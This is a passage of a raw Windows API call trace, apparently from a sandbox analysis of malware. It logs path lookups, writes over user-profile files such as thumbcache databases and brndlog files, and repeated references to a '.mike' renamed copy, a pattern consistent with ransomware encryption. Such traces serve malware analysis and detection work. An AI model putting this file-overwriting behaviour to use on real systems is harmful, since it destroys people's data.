cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x57 [0157.293] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 0x61 [0157.293] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", lpszLongPath=0x2aebc0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 0x61 [0157.294] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aeba0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x57 [0157.295] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\", lpszLongPath=0x2aeba0, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\") returned 0x62 [0157.296] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", lpszLongPath=0x2aeb94, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\") returned 0x57 [0157.297] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\", lpszLongPath=0x2aeb94, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\") returned 0x62 [0157.298] GetLongPathNameW (in: lpszShortPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\", lpszLongPath=0x2aeb94, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\") returned 0x62 [0157.300] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.300] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.300] CoTaskMemFree (pv=0x508980) [0157.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.304] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.304] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.305] CoTaskMemFree (pv=0x508980) [0157.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.306] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.306] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.306] CoTaskMemFree (pv=0x508980) [0157.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.307] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.307] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.307] CoTaskMemFree (pv=0x508980) [0157.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.308] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.308] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.308] CoTaskMemFree (pv=0x508980) [0157.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.309] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.309] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.309] CoTaskMemFree (pv=0x508980) [0157.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.310] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0157.311] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak", lpFilePart=0x0) returned 0x46 [0157.316] WriteFile (in: hFile=0x1c8, lpBuffer=0x22dba1c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x22dba1c*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0157.317] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak", dwFileAttributes=0x80) returned 1 [0157.319] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0157.320] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt", lpFilePart=0x0) returned 0x46 [0157.327] WriteFile (in: hFile=0x1c8, lpBuffer=0x22f8cc4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x22f8cc4*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0157.327] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt", dwFileAttributes=0x80) returned 1 [0157.332] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.332] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.333] CoTaskMemFree (pv=0x508980) [0157.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.341] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.341] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.341] CoTaskMemFree (pv=0x508980) [0157.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.343] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.343] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.343] CoTaskMemFree (pv=0x508980) [0157.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.343] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.343] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.344] CoTaskMemFree (pv=0x508980) [0157.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.349] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.349] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.349] CoTaskMemFree (pv=0x508980) [0157.350] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.356] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.356] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.356] CoTaskMemFree (pv=0x508980) [0157.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.357] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.357] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.357] CoTaskMemFree (pv=0x508980) [0157.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.358] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.358] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.358] CoTaskMemFree (pv=0x508980) [0157.359] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0157.359] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0157.359] CoTaskMemFree (pv=0x508980) [0157.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aebd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0157.363] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0157.363] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db", lpFilePart=0x0) returned 0x4c [0157.369] WriteFile (in: hFile=0x1c8, lpBuffer=0x2158e18*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af014, lpOverlapped=0x0 | out: lpBuffer=0x2158e18*, lpNumberOfBytesWritten=0x2af014*=0x20c, lpOverlapped=0x0) returned 1 [0157.370] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db", dwFileAttributes=0x80) returned 1 [0157.372] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0157.373] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db", nBufferLength=0x105, lpBuffer=0x2aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db", lpFilePart=0x0) returned 0x4b [0157.387] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.389] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.391] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.392] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.394] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.395] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.396] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.398] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.399] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.400] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.402] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.403] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.405] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.408] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.410] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.413] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.416] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.418] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.420] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.449] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.452] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.456] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.458] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.461] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.464] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.466] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.470] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.472] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.474] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.476] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.478] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.482] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.484] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.486] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.488] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.490] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.493] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.495] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.497] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.499] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", nBufferLength=0x105, lpBuffer=0x2aea70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db.mike", lpFilePart=0x0) returned 0x50 [0157.501] GetFullPathNameW (in: 